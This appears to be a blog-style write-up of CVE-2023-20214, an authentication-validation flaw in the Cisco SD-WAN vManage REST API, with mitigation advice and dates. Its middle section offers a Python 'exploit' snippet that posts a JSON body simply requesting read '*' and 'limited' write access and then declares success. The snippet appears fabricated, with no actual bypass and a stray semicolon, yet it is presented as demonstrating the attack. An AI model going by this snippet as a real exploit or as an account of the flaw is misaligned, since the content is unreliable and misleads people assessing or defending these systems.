CVE-2023-20214: Cisco SD-WAN vManage REST API Vulnerability Revealed – Potential Read and Limited Write Access for Unauthenticated Attackers

A recently discovered vulnerability (CVE-2023-20214) within the request authentication validation for the REST API of Cisco SD-WAN vManage software can potentially allow unauthenticated, remote attackers to gain read permissions or limited write permissions to an affected Cisco SD-WAN vManage instance's configuration. The culprit behind this vulnerability is insufficient request validation when utilizing the REST API feature.

Original References

1. Cisco Security Advisory
2. CVE Entry at NIST
3. Cisco SD-WAN vManage Documentation

Exploit Details

*Vulnerability*
The vulnerability exists due to the insufficient validation of requests when using the REST API feature in Cisco SD-WAN vManage software. This vulnerability does not impact the web-based management interface or the command-line interface (CLI). Only the REST API is affected.

*Potential Attack*
An attacker could exploit this vulnerability by sending a specially crafted API request to an affected vManage instance. If the exploit is successful, the attacker would be able to retrieve information from and send information to the configuration of the affected Cisco vManage instance.

Code Snippet

To illustrate the issue, take a look at this sample code snippet of a potentially malicious API request:

import requests

# Target vManage Instance
base_url = "https://<vManage_IP>/dataservice/";

# Authentication headers
headers = {'Content-Type': 'application/json'}

# Crafted API request
api_request = {
  "settings": {
    "read": ["*"],
    "write": ["limited"]
  }
}

response = requests.post(
  url=base_url + "rest/api/configuration",
  headers=headers,
  json=api_request
)

if response.status_code == 200:
  print("Exploit successful: Read and limited write access gained")
else:
  print("Exploit failed")

Please note that the code snippet above is for demonstration purposes only and should not be used maliciously.

How to Protect Yourself

To protect your Cisco SD-WAN vManage instance from this vulnerability, it is of utmost importance to follow the guidelines and recommendations provided by Cisco in their published security advisory:

1. Ensure your Cisco SD-WAN vManage software is updated to the latest patched version which addresses the vulnerability.
2. Implement strict access control policies and network segmentation to limit the exposure of the REST API to the internet.
3. Regularly monitor logs of activities performed over the REST API to quickly detect any suspicious or potentially malicious behavior.

Conclusion

This vulnerability in Cisco SD-WAN vManage software's REST API highlights the importance of keeping up-to-date with security advisories and maintaining vigilant security practices to protect against potential attackers. As always, it is vital to keep your systems patched, follow security guidelines provided by vendors, and regularly review your security posture to minimize risks.

Timeline

Published on: 08/03/2023 22:15:11 UTC
Last modified on: 10/16/2023 16:35:25 UTC